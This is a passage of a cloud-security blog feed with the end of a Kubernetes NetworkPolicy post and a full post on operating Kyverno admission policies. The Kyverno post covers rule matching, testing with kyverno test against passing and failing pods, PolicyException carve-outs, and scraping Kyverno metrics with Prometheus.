<p>Every other path is cut off. We’ve shrunk the surface area from “everything-to-everything” down to a single three-hop chain. Peace out, lateral movement.</p>
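<p>If you want to see a blocked path with your own eyes, try the frontend → db hop directly. Under the policies above it should time out rather than connect:</p>
<pre><code class="lang-bash"># From the frontend namespace, attempt the now-forbidden hop to Postgres.
# Expect a timeout (-w 3 caps the wait), not "succeeded!".
kubectl run -n frontend test --image=nicolaka/netshoot -it --rm -- \
  nc -vz -w 3 postgres.db.svc.cluster.local 5432
</code></pre>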
<hr />
<h2 id="heading-whats-next-scaling-with-calico">What’s Next (Scaling with Calico)</h2>
<p>That’s the baseline: Kubernetes <code>NetworkPolicy</code> gave us simple, effective service boundaries at the L3/L4 level. It works. But what happens when you’re running dozens of namespaces? How do you enforce organization-wide defaults without copy-pasting YAML everywhere? An <a target="_blank" href="https://cloudsecburrito.com/control-issues-tales-of-kubernetes-admission">admission controller</a> could help, sure (oh yeah, I wrote about that), but we shouldn’t need one for everything in Kubernetes. </p>
<p>That’s where <strong>Calico</strong> comes in. In Part 2, we’ll take this same model and scale it with Calico’s <strong>GlobalNetworkPolicies</strong>, <strong>NetworkSets</strong>, and built-in flow logs. It’s the same idea of least privilege, but with tools designed to handle more than a three-tier demo app.</p>
<p>Stay tuned, loyal reader.</p>
]]></content:encoded></item><item><title><![CDATA[Control Issues: From Policy to Practice]]></title><description><![CDATA[You can get a lot done in Kubernetes just by blocking bad stuff at admission time. That’s where we left things in Part 2. We installed Kyverno, wrote policies, and saw workloads getting stopped before they cause trouble. We also saw things like mutat...]]></description><link>https://cloudsecburrito.com/control-issues-from-policy-to-practice</link><guid isPermaLink="true">https://cloudsecburrito.com/control-issues-from-policy-to-practice</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[kyverno]]></category><category><![CDATA[admission controller]]></category><category><![CDATA[Security]]></category><category><![CDATA[YAML]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 20 Aug 2025 01:32:50 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755647010216/236845bd-9dcd-442a-8560-42d1ad4e4fcd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>You can get a lot done in Kubernetes just by blocking bad stuff at admission time. That’s where we left things in Part 2. We installed Kyverno, wrote policies, and saw workloads getting stopped before they cause trouble. We also saw things like mutations and generating resources on the fly. It was all fairly straightforward.</p>
<p>But how can we take Kyverno to the next level without just writing a couple of ClusterPolicy YAMLs and calling it a day? Policies don’t live in a vacuum. They need testing, exceptions, tuning, and visibility into what’s actually happening in your cluster. And the cool thing is, all of that is built into Kyverno or available in one of its side projects.</p>
<p>In Part 3 of this series, we’re moving past “first policy” territory and into operations. We’ll cover:</p>
<ul>
<li>Matching what gets blocked  </li>
<li>Testing policies before they hit the cluster with <code>kyverno test</code>  </li>
<li>Making exceptions without throwing away your guardrails  </li>
<li>Borrowing from the upstream policy library for quick wins like <code>securityContext</code> hardening and volume restrictions  </li>
<li>Observing policy activity with Prometheus metrics and Policy Reporter dashboards  </li>
</ul>
<p>The goal here isn’t to write more YAML. It’s to build a feedback loop where your policies get better, your exceptions are targeted, and you can actually prove the impact of your enforcement. As usual, let's get to it.</p>
<hr />
<h2 id="heading-match-exclude-and-the-patterns-that-follow">Match, Exclude, and the Patterns That Follow</h2>
<p>Before we pile on tests, exceptions, and dashboards, let’s be crystal clear on <strong>how a rule decides it applies</strong> and what happens next. Most “why did this block?” mysteries boil down to match logic or pattern evaluation, simple as that.  </p>
<h3 id="heading-rule-evaluation-order">Rule Evaluation Order</h3>
<p>For each incoming request, Kyverno runs through this sequence:  </p>
<ol>
<li><strong>Match</strong> – does the resource match <code>match.resources</code>? If not, skip.  </li>
<li><strong>Exclude</strong> – does it also match <code>exclude.resources</code>? If yes, skip.  </li>
<li><strong>Preconditions</strong> – optional extra checks (e.g. JMESPath). If false, skip.  </li>
<li><strong>Action</strong> – run the rule (<code>validate</code>, <code>mutate</code>, <code>generate</code>, or <code>verify</code>).  </li>
</ol>
<blockquote>
<p>Note: mutations always happen before validations.  </p>
</blockquote>
<p>If you’re confused about <code>match</code> vs <code>exclude</code>, you’re not alone. The docs aren’t explicit about ordering, but the <a target="_blank" href="https://github.com/kyverno/kyverno/blob/main/pkg/engine/utils/match.go">source</a> makes it clear: <strong>match first, exclude second</strong>. Of course that ordering makes sense as an optimization, but it would be nice if the docs said so.</p>
<h3 id="heading-and-vs-or-logic">AND vs OR Logic</h3>
<ul>
<li>Inside a single <code>resources</code> block, fields are <strong>ANDed</strong>. All must match.  </li>
<li>Use <code>any:</code> to OR multiple <code>resources</code> blocks.  </li>
</ul>
<pre><code class="lang-yaml"><span class="hljs-comment"># Pods in prod namespace AND labeled app=backend</span>
<span class="hljs-attr">match:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
    <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"prod"</span>]
    <span class="hljs-attr">selector:</span>
      <span class="hljs-attr">matchLabels:</span>
        <span class="hljs-attr">app:</span> <span class="hljs-string">backend</span>
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-comment"># Pods in prod namespace OR labeled app=backend</span>
<span class="hljs-attr">match:</span>
  <span class="hljs-attr">any:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
        <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"prod"</span>]
    <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
        <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
        <span class="hljs-attr">selector:</span>
          <span class="hljs-attr">matchLabels:</span>
            <span class="hljs-attr">app:</span> <span class="hljs-string">backend</span>
</code></pre>
<h3 id="heading-match-quick-reference">Match Quick Reference</h3>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Field</td><td>What it does</td><td>Notes</td></tr>
</thead>
<tbody>
<tr>
<td><code>kinds</code></td><td>Resource kind (<code>Pod</code>, <code>Deployment</code>, etc.)</td><td>Case-sensitive.</td></tr>
<tr>
<td><code>names</code></td><td>Specific object names</td><td>Exact match only.</td></tr>
<tr>
<td><code>namespaces</code></td><td>Namespace name(s)</td><td>Ignored for cluster-scoped kinds.</td></tr>
<tr>
<td><code>selector</code></td><td>Labels on the resource</td><td>Standard <code>matchLabels</code>/<code>matchExpressions</code>.</td></tr>
<tr>
<td><code>annotations</code></td><td>Match by annotations</td><td>Same syntax as labels.</td></tr>
<tr>
<td><code>operations</code></td><td>Admission verbs</td><td><code>CREATE</code>, <code>UPDATE</code>, <code>DELETE</code>, <code>CONNECT</code>.</td></tr>
<tr>
<td><code>userInfo</code></td><td>Who made the request</td><td>Roles, clusterRoles, users, service accounts.</td></tr>
</tbody>
</table>
</div><p><strong>Top-level match/exclude clauses:</strong></p>
<ul>
<li><code>resources</code>: select by names, namespaces, kinds, operations, labels, annotations, and namespace selectors.  </li>
<li><code>subjects</code>: select users, groups, and service accounts.  </li>
<li><code>roles</code>: select namespaced roles.  </li>
<li><code>clusterRoles</code>: select cluster-wide roles.  </li>
</ul>
<h3 id="heading-preconditions">Preconditions</h3>
<p>If <code>match</code>/<code>exclude</code> got you in the door, <strong>preconditions</strong> let you add “only if…” filters. They run <em>after</em> match/exclude but before action.  </p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Only when hostNetwork=true</span>
<span class="hljs-attr">preconditions:</span>
  <span class="hljs-attr">all:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">"<span class="hljs-template-variable">{{ request.object.spec.hostNetwork }}</span>"</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Equals</span>
      <span class="hljs-attr">value:</span> <span class="hljs-literal">true</span>
</code></pre>
<p>Great for scoping rules by field presence, among other things. </p>
<h3 id="heading-patterns-the-real-work">Patterns: The Real Work</h3>
<p>Once a rule <em>applies</em>, Kyverno still needs to know <strong>what inside the YAML you care about</strong>. That’s where <code>pattern</code> (or <code>anyPattern</code>) comes in.  </p>
<p>Patterns are structural YAML matches, not regexes. You describe the shape/values you expect, and Kyverno checks them.  </p>
<ul>
<li><code>pattern</code> — all conditions must be satisfied.  </li>
<li><code>anyPattern</code> — resource passes if it matches <em>any</em> of the listed patterns.  </li>
</ul>
<pre><code class="lang-yaml"><span class="hljs-attr">validate:</span>
  <span class="hljs-attr">pattern:</span>
    <span class="hljs-attr">spec:</span>
      <span class="hljs-attr">securityContext:</span>
        <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
</code></pre>
<pre><code class="lang-yaml"><span class="hljs-attr">validate:</span>
  <span class="hljs-attr">anyPattern:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">securityContext:</span>
          <span class="hljs-attr">runAsUser:</span> <span class="hljs-number">1000</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
        <span class="hljs-attr">securityContext:</span>
          <span class="hljs-attr">runAsNonRoot:</span> <span class="hljs-literal">true</span>
</code></pre>
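<p>One pattern feature worth learning early is Kyverno’s <strong>anchor</strong> syntax. A conditional anchor like <code>=(field)</code> means “only check this if the field is present,” which is how you validate optional fields without forcing them to exist. A minimal sketch (not tied to any policy in this post):</p>
<pre><code class="lang-yaml"># Sketch: if a container sets securityContext at all, privileged must be false.
# =( ) is Kyverno's conditional anchor: absent fields are simply skipped.
validate:
  pattern:
    spec:
      containers:
      - =(securityContext):
          =(privileged): false
</code></pre>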
<p>This is just scratching the surface, but it’s enough of an overview to start using Kyverno effectively.</p>
<h3 id="heading-a-note-on-cel">A Note on CEL</h3>
<p>Patterns today are Kyverno’s own YAML-driven DSL with some JMESPath helpers. <a target="_blank" href="https://cel.dev/">CEL</a> support is coming (and will eventually unify expression logic across Kubernetes), but for now: stick with patterns.  </p>
<hr />
<h2 id="heading-testing-policies-with-kyverno-test">Testing Policies with <code>kyverno test</code></h2>
<p>Before you unleash a new policy on your cluster, it’s worth <a target="_blank" href="https://kyverno.io/docs/testing-policies/">testing it locally</a>. That’s what <code>kyverno test</code> is for: simulating policy evaluations against sample resources, <strong>without</strong> creating or blocking anything in Kubernetes.</p>
<p>Unlike <code>kyverno apply</code>, which is handy for quick checks, <code>kyverno test</code> is built for <strong>programmatic, repeatable testing</strong>. It evaluates match criteria (kinds, namespaces, labels, annotations) exactly like the admission controller would, so you can see which rules apply and which get skipped.</p>
<h3 id="heading-example-policy">Example Policy</h3>
<p>Here’s our <code>block-hostpath.yaml</code> validating policy from Part 2:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">block-hostpath</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">validationFailureAction:</span> <span class="hljs-string">Enforce</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">disallow-hostpath</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span>
            <span class="hljs-bullet">-</span> <span class="hljs-string">Pod</span>
          <span class="hljs-attr">selector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
      <span class="hljs-attr">validate:</span>
        <span class="hljs-attr">message:</span> <span class="hljs-string">"hostPath volumes are not allowed."</span>
        <span class="hljs-attr">pattern:</span>
          <span class="hljs-attr">spec:</span>
            <span class="hljs-attr">volumes:</span>
              <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>Notice the <code>selector</code>, which means this rule only applies to Pods labeled <code>app=kyverno-demo</code>. If your resource doesn’t match that, the test will skip it.</p>
<h3 id="heading-setting-up-a-test-directory">Setting Up a Test Directory</h3>
<p>Let's create a place to store our tests. Keeping the policy, resources, and test manifest in one directory makes everything more manageable.</p>
<pre><code class="lang-bash">mkdir kyverno-tests
<span class="hljs-built_in">cd</span> kyverno-tests
cp /path/to/block-hostpath.yaml .
</code></pre>
<h3 id="heading-create-a-passing-and-failing-pod">Create a Passing and Failing Pod</h3>
<p>Bad Pod (should fail):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">bad-pod</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
  <span class="hljs-attr">volumes:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">root-mount</span>
      <span class="hljs-attr">hostPath:</span>
        <span class="hljs-attr">path:</span> <span class="hljs-string">/</span>
</code></pre>
<p>Good Pod (should pass):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">good-pod</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">nginx</span>
      <span class="hljs-attr">image:</span> <span class="hljs-string">nginx</span>
</code></pre>
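<p>With both pods in hand, a one-off sanity check with <code>kyverno apply</code> works before we write a proper test (assuming the CLI is installed and the files are saved as <code>bad-pod.yaml</code> and <code>good-pod.yaml</code>):</p>
<pre><code class="lang-bash"># One-off check: evaluates the policy against a manifest, no cluster needed.
kyverno apply block-hostpath.yaml --resource bad-pod.yaml
kyverno apply block-hostpath.yaml --resource good-pod.yaml
</code></pre>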
<h3 id="heading-create-a-test">Create a Test</h3>
<p>Now let’s create a test manifest to check both pods against the policy.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cli.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Test</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-test</span>
<span class="hljs-attr">policies:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">block-hostpath.yaml</span>
<span class="hljs-attr">resources:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">bad-pod.yaml</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">good-pod.yaml</span>
<span class="hljs-attr">results:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">policy:</span> <span class="hljs-string">block-hostpath</span>
  <span class="hljs-attr">rule:</span> <span class="hljs-string">disallow-hostpath</span>
  <span class="hljs-attr">result:</span> <span class="hljs-string">pass</span>
</code></pre>
<p>This tells the Kyverno CLI three things:</p>
<ul>
<li><strong>policies</strong>: which policy files to load (<code>block-hostpath.yaml</code>)  </li>
<li><strong>resources</strong>: which resource manifests to run those policies against (<code>bad-pod.yaml</code>, <code>good-pod.yaml</code>)  </li>
<li><strong>results</strong>: what you expect to happen. Here, the <code>disallow-hostpath</code> rule should pass for the given resource.</li>
</ul>
<h3 id="heading-running-the-test">Running the Test</h3>
<p>Save the manifest as <code>kyverno-test.yaml</code> and run:</p>
<pre><code class="lang-bash">kyverno <span class="hljs-built_in">test</span> .
</code></pre>
<p>Example output:</p>
<pre><code class="lang-bash">│ ID │ POLICY         │ RULE              │ RESOURCE                │ RESULT │ REASON              │
│────│────────────────│───────────────────│─────────────────────────│────────│─────────────────────│
│ 1  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/good-pod │ Fail   │ Want pass, got fail │
│ 2  │ block-hostpath │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 0 tests passed and 2 tests failed
Error: 2 tests failed
</code></pre>
<p>The pods respect the policy when applied to a live cluster, but the test fails. Why? Because of how we wrote the pattern:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">pattern:</span>
  <span class="hljs-attr">spec:</span>
    <span class="hljs-attr">volumes:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>If the <code>volumes</code> block is completely missing, the test still fails. To handle this, we need <code>anyPattern</code>.</p>
<h3 id="heading-fixing-with-anypattern">Fixing with <code>anyPattern</code></h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">block-hostpath-updated</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">validationFailureAction:</span> <span class="hljs-string">Enforce</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">disallow-hostpath</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
          <span class="hljs-attr">selector:</span>
            <span class="hljs-attr">matchLabels:</span>
              <span class="hljs-attr">app:</span> <span class="hljs-string">kyverno-demo</span>
      <span class="hljs-attr">validate:</span>
        <span class="hljs-attr">message:</span> <span class="hljs-string">"hostPath volumes are not allowed."</span>
        <span class="hljs-attr">anyPattern:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
              <span class="hljs-string">=(volumes):</span> <span class="hljs-string">"absent"</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">spec:</span>
              <span class="hljs-attr">volumes:</span>
                <span class="hljs-bullet">-</span> <span class="hljs-string">=(hostPath):</span> <span class="hljs-string">"absent"</span>
</code></pre>
<p>Update the test to use this policy:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">cli.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Test</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-test</span>
<span class="hljs-attr">policies:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">block-hostpath-updated.yaml</span>
<span class="hljs-attr">resources:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">bad-pod.yaml</span>
  <span class="hljs-bullet">-</span> <span class="hljs-string">good-pod.yaml</span>
<span class="hljs-attr">results:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">policy:</span> <span class="hljs-string">block-hostpath-updated</span>
  <span class="hljs-attr">rule:</span> <span class="hljs-string">disallow-hostpath</span>
  <span class="hljs-attr">result:</span> <span class="hljs-string">pass</span>
</code></pre>
<p>Run again:</p>
<pre><code class="lang-bash">│ ID │ POLICY                 │ RULE              │ RESOURCE                │ RESULT │ REASON │
│────│────────────────────────│───────────────────│─────────────────────────│────────│────────│
│ 1  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/good-pod │ Pass   │ Ok     │
│ 2  │ block-hostpath-updated │ disallow-hostpath │ v1/Pod/default/bad-pod  │ Fail   │ Want pass, got fail │

Test Summary: 1 tests passed and 1 tests failed
Error: 1 tests failed
</code></pre>
<p>Better. The good pod now passes, and the bad pod is still blocked. The remaining “failure” is just the test harness: we only declared a <code>pass</code> expectation, so the bad pod being correctly denied gets reported as a failed test.</p>
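<p>To make the suite itself go green, declare per-resource expectations: <code>pass</code> for the good pod and <code>fail</code> for the bad one. A sketch using the <code>resources</code> field on each result entry:</p>
<pre><code class="lang-yaml"># Sketch: expected outcomes declared per resource, so a correctly
# blocked bad-pod counts as a passing test.
results:
- policy: block-hostpath-updated
  rule: disallow-hostpath
  resources: [good-pod]
  result: pass
- policy: block-hostpath-updated
  rule: disallow-hostpath
  resources: [bad-pod]
  result: fail
</code></pre>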
<h3 id="heading-next-steps">Next Steps</h3>
<p>There’s much more you can do with tests, including variables, JSON patches, and negative cases. If you want to level up further, check out <a target="_blank" href="https://kyverno.io/docs/kyverno-chainsaw/">Chainsaw</a>, a more advanced testing project for Kyverno.</p>
<hr />
<h2 id="heading-exceptions-two-practical-paths">Exceptions (Two Practical Paths)</h2>
<p>You’ll need exceptions. The trick is making them <strong>surgical</strong>, not blanket “turn it all off.” Here are two clean approaches.</p>
<h3 id="heading-option-1-use-the-exclude-block-fast-and-built-in">Option 1 — Use the <code>exclude</code> Block (Fast and Built-In)</h3>
<p>Keep a single global policy and carve out narrowly with <code>exclude</code>. Four common exclusion types:</p>
<p><strong>Namespace carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"legacy-systems"</span>, <span class="hljs-string">"migration"</span>, <span class="hljs-string">"bleeding-edge"</span>]
</code></pre>
<p>Predictable, but blunt. Whole namespaces get a hall pass.</p>
<p><strong>Label-based carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">resources:</span>
    <span class="hljs-attr">selector:</span>
      <span class="hljs-attr">matchLabels:</span>
        <span class="hljs-attr">kyverno-exempt:</span> <span class="hljs-string">"true"</span>
</code></pre>
<p>Tactical: mark a pod with <code>kyverno-exempt=true</code> and it skips evaluation.</p>
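<p>In practice, exempting a workload is a one-liner (pod name hypothetical):</p>
<pre><code class="lang-bash"># Label an existing pod so the exclude selector skips it on future evaluations.
kubectl label pod legacy-agent kyverno-exempt=true
</code></pre>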
<p><strong>Role-based carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">any:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">clusterRoles:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">cluster-admin</span>
</code></pre>
<p>If <code>cluster-admin</code> creates it, hands off. (Sometimes you need to respect the crown.)</p>
<p><strong>Subject-targeted carve-out:</strong></p>
<pre><code class="lang-yaml"><span class="hljs-attr">exclude:</span>
  <span class="hljs-attr">any:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">subjects:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">User</span>
      <span class="hljs-attr">name:</span> <span class="hljs-string">CloudSecBurrito</span>
</code></pre>
<p>Skip checks for one named user. Minimal and very explicit.</p>
<hr />
<h3 id="heading-option-2-policyexception-crd-surgical-and-auditable">Option 2 — PolicyException CRD (Surgical and Auditable)</h3>
<p>When you need to exempt <strong>one rule of one policy</strong> for a <strong>specific target</strong>, use the <code>PolicyException</code> CRD. It doesn’t touch the original policy, and it’s easy to audit later.</p>
<p>You’ll need to enable it (disabled by default). Example flow:</p>
<pre><code class="lang-bash">kubectl create namespace kyverno-exceptions

kubectl -n kyverno patch deploy kyverno-admission-controller --<span class="hljs-built_in">type</span>=<span class="hljs-string">'json'</span> -p=<span class="hljs-string">'[
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--enablePolicyException=true"},
  {"op":"add","path":"/spec/template/spec/containers/0/args/-","value":"--exceptionNamespace=kyverno-exceptions"}
]'</span>
</code></pre>
<p>Check which versions are supported:</p>
<pre><code class="lang-bash">kubectl get crd policyexceptions.kyverno.io -o jsonpath=<span class="hljs-string">'{range .spec.versions[*]}{.name}{"\t"}{.served}{"\t"}{.storage}{"\n"}{end}'</span>
</code></pre>
<p>If you see <code>v2 true true</code>, your manifest should use <code>apiVersion: kyverno.io/v2</code>.</p>
<p><strong>Example exception</strong> — exempt one pod from the <code>block-hostpath</code> rule:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v2</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">PolicyException</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">allow-special-pod</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kyverno-exceptions</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">exceptions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">policyName:</span> <span class="hljs-string">block-hostpath</span>
      <span class="hljs-attr">ruleNames:</span> [<span class="hljs-string">"disallow-hostpath"</span>]
  <span class="hljs-attr">match:</span>
    <span class="hljs-attr">any:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
          <span class="hljs-attr">kinds:</span> [<span class="hljs-string">"Pod"</span>]
          <span class="hljs-attr">namespaces:</span> [<span class="hljs-string">"default"</span>]
          <span class="hljs-attr">names:</span> [<span class="hljs-string">"special-pod"</span>]
</code></pre>
<p>Now that pod runs, but the policy stays enforced everywhere else. Surgical, auditable, and controlled.</p>
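<p>And because every exception lives as its own object in one dedicated namespace, auditing them later is trivial:</p>
<pre><code class="lang-bash"># List all active exceptions; each one names the policy and rules it bypasses.
kubectl -n kyverno-exceptions get policyexceptions
</code></pre>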
<hr />
<h2 id="heading-monitoring-kyverno-with-prometheus">Monitoring Kyverno with Prometheus</h2>
<p>You don’t need 12 dashboards to prove policies work. Just scrape Kyverno, run a couple queries, and move on. Prometheus pros can skip ahead.</p>
<h3 id="heading-basic-setup-kube-prometheus-stack">Basic setup (kube-prometheus-stack)</h3>
<p>Deploy Prometheus (yes, Grafana comes along for the ride, we’re ignoring it):</p>
<pre><code class="lang-bash">helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
kubectl create namespace monitoring
helm install kube-prom prometheus-community/kube-prometheus-stack -n monitoring
</code></pre>
<p>Patch it to NodePort so you can hit it locally:</p>
<pre><code class="lang-bash">kubectl patch svc kube-prom-kube-prometheus-prometheus   -n monitoring   -p <span class="hljs-string">'{"spec": {"type": "NodePort"}}'</span>
kubectl get svc kube-prom-kube-prometheus-prometheus -n monitoring -o wide
</code></pre>
<p>Access Prometheus at something like <code>http://192.168.64.7:31559/</code>. Cool. Now onto the ServiceMonitor.</p>
<h3 id="heading-configure-a-servicemonitor-for-kyverno">Configure a ServiceMonitor for Kyverno</h3>
<p>Create a <strong>ServiceMonitor</strong> that matches kube-prometheus-stack’s selector (<code>release: kube-prom</code>):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">monitoring.coreos.com/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ServiceMonitor</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">kyverno-metrics</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">kyverno</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">release:</span> <span class="hljs-string">kube-prom</span>   <span class="hljs-comment"># IMPORTANT: must match Prometheus CR serviceMonitorSelector</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">kyverno-admission-controller</span>
  <span class="hljs-attr">namespaceSelector:</span>
    <span class="hljs-attr">matchNames:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-string">kyverno</span>
  <span class="hljs-attr">endpoints:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8000</span>
      <span class="hljs-attr">path:</span> <span class="hljs-string">/metrics</span>
      <span class="hljs-attr">interval:</span> <span class="hljs-string">30s</span>
</code></pre>
<p>Apply it, then check the <code>/targets</code> page in the Prometheus UI to confirm the Kyverno endpoint is UP.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576247462/e5fae915-b604-4748-b228-1bde22b79970.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-a-couple-queries">A Couple Queries</h3>
<p>Failures for Pods in the default namespace over the last 5 minutes (create something broken first so it is guaranteed to show data):</p>
<pre><code class="lang-promql">kyverno_policy_results_total{rule_result="fail",resource_kind="Pod",resource_namespace="default"}[5m]
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1755576186863/2bab5086-2bca-4a9a-90d3-b1b50aaf03ee.png" alt class="image--center mx-auto" /></p>
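<p>A bare range selector like that returns raw samples, so it only renders in the Prometheus Table view. If you’d rather have a single number, one way is to wrap it in <code>increase()</code> and <code>sum()</code> — a sketch using the same labels:</p>

```promql
sum(increase(kyverno_policy_results_total{rule_result="fail",resource_kind="Pod",resource_namespace="default"}[5m]))
```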
<p>Policy changes (create a new policy, then refresh the query):</p>
<pre><code class="lang-promql">kyverno_policy_changes_total
</code></pre>
<p>And for a quick heartbeat check, make sure Kyverno’s alive at all:</p>
<pre><code class="lang-promql">kyverno_info
</code></pre>
<p>That’s it. Prometheus is scraping Kyverno, queries return real numbers, and you didn’t even need to pretend to like dashboards.</p>
